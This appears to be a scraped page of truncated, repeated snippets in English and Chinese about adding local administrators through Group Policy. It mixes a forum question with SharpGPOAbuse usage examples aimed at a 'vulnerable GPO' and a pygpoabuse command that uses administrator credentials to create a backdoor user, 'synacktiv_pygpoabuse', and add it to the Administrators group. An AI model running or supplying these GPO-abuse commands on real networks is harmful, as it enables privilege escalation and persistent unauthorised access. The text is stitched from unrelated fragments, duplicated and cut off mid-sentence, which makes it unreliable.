I try to do another GPO to add new local admins (Computer Configuration-Preferences-Control panel setting-local user and groups) and use logon startup (net localgroup Administrators "username" /add).Not work. :(How to troubleshoot and fix this problem?All replies (42)...
Options required to add a new local admin: --UserAccount 设置需要添加进本地管理员组中的账号名称。 --GPOName 存在安全漏洞的GPO名称。 样例: SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO" 配置一个用户或计算机登录脚本 Options required to add a new user ...
Allow log on locally ->Local Security Settings->"Add User or Group" function is Disabled (grayed out) allow non admin users (without being local admin) the rights to install any software they choose without elevation, Not just deployed msi's etc. Allow non admin users access to Color Mana...
Options required to add anewlocaladmin:--UserAccount 设置需要添加进本地管理员组中的账号名称。--GPOName 存在安全漏洞的GPO名称。样例:SharpGPOAbuse.exe--AddLocalAdmin--UserAccount bob.smith--GPOName"Vulnerable GPO" 配置一个用户或计算机登录脚本 代码语言:javascript 复制 Options required to add anewus...
Allow log on locally ->Local Security Settings->"Add User or Group" function is Disabled (grayed out) allow non admin users (without being local admin) the rights to install any software they choose without elevation, Not just deployed msi's etc. Allow non admin users access to Color Manag...
Adding a Local Admin Options required to add a new local admin: --UserAccount Set the name of the account to be added in local admins. --GPOName The name of the vulnerable GPO. Example: SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO" ...
PS C:\> Invoke-IpamGpoProvisioning -Domain "child.contoso.com" -GpoPrefixName "IPAM1" -DelegatedGpoGroup "IPAMAdmins" -ForceThis command creates the universal group named IPAMUG in domain child.contoso.com, if not already present, and adds the computer account of the local computer running ...
PS C:\> Invoke-IpamGpoProvisioning -Domain "child.contoso.com" -GpoPrefixName "IPAM1" -DelegatedGpoGroup "IPAMAdmins" -ForceThis command creates the universal group named IPAMUG in domain child.contoso.com, if not already present, and adds the computer account of the local computer running ...
python3 pygpoabuse.py 'zpchcbd.com/administrator:admin@123123123' -dc-ip -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9' -command 'net user synacktiv_pygpoabuse Password123! /add && net localgroup administrators synacktiv_pygpoabuse /add' -description 'push default task...
将PowerShell 脚本设置为将 GPO 名称视为变量的方法如下: 1. 首先,你需要创建一个 PowerShell 脚本文件,可以使用任何文本编辑器,比如记事本。将文件保存为以 .ps1 为...